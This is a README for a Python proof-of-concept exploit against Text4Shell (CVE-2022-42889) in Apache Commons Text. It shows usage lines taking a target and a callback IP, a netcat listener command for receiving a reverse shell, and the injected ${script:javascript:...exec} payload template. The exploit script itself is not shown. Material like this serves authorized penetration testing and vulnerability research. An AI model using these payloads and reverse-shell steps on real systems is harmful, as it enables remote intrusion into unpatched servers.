## https://sploitus.com/exploit?id=1297A1E0-6C73-5A35-8485-0DD155F2B51D
# text4shell-exploit
A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10.
This exploit targets vulnerable Java applications that use the `StringSubstitutor` class with interpolation enabled, allowing injection of `${script:...}` expressions to execute arbitrary system commands.
In this PoC, exploitation is demonstrated via the `data` query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic.
**Disclaimer**: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.
## Description
This is a custom Python3 exploit for the Apache Commons Text vulnerability known as **Text4Shell** (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by `StringSubstitutor`.
Tested against:
- Apache Commons Text < 1.10.0
- Java applications using `${script:...}` interpolation from untrusted input
## Usage
```bash
python3 text4shell.py <target_ip> <callback_ip> <callback_port>
```
## Example
```bash
python3 text4shell.py 127.0.0.1 192.168.1.2 4444
```
## Make sure to set up a lsitener on your attacking machine:
```bash
nc -nlvp 4444
```
## Payload Logic
The script injects:
```bash
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}
```
The reverse shell is sent via `/data` parameter using a POST request.